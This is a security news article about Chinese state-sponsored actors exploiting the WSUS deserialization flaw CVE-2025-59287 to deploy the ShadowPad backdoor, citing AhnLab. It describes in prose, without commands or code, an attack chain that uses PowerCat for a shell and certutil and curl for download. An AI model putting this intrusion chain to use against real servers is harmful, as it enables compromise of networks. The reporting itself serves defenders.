- Chinese state-sponsored actors exploit CVE-2025-59287, a critical flaw in WSUS that allows unauthenticated RCE with SYSTEM privileges.
- AhnLab reports that attackers are using PowerCat and certutil/curl to spread ShadowPad, a backdoor sequel to PlugX.
- Potential targets include the government, defense, telecommunications and critical infrastructure sectors.
Experts warn that Chinese state-sponsored threat actors are actively exploiting a vulnerability in Microsoft windows Server update Services (WSUS) to spread malware.
As part of the October 2025 Patch Tuesday cumulative update, Microsoft fixed CVE-2025-59287, an “unreliable data deserialization” flaw found in the Windows Server Update Service (WSUS). The bug was given a severity rating of 9.8/10 (Critical) because it appears to allow Remote Code Execution (RCE) attacks. It can be exploited in low-complexity attacks without user intervention, allowing unauthenticated and unprivileged threat actors to execute malicious code with SYSTEM privileges. In theory, this would allow them to swap and infect other WSUS servers.
Shortly thereafter, publicly available proof-of-concept (PoC) code was discovered, prompting Microsoft to also release an out-of-band (OOB) security update.
Used for implementing ShadowPad
Today, security researchers at the AhnLab Security Intelligence Center (ASEC) said they have observed attacks on unpatched endpoints, suggesting they are the work of the Chinese.
“The attacker targeted Windows servers with WSUS enabled and exploited CVE-2025-59287 for initial access,” the report states. “They then used PowerCat, an open source PowerShell-based Netcat tool, to obtain a system shell (CMD). They then downloaded and installed ShadowPad using certutil and curl.”
ShadowPad is said to be the successor to PlugX, a modular backdoor “widely used” by Chinese state-sponsored hacking collectives. Deployment to target endpoints is done by downloading DLLs via a legitimate binary called ETDCtrlHelper.exe.
We don’t know how many companies were attacked by WSUS, where they are located, or what industries they operate in. But when it comes to Chinese works, they target governments, military and defense, telecommunications, or critical infrastructure.
“After the vulnerability’s proof-of-concept (PoC) exploit code was publicly released, attackers quickly used it to spread the ShadowPad malware to WSUS servers,” AhnLab said. “This vulnerability is critical because it allows remote code execution with system-level privileges, significantly increasing the potential impact.”
WSUS allows IT administrators to manage patched computers on their network.
IN hacker news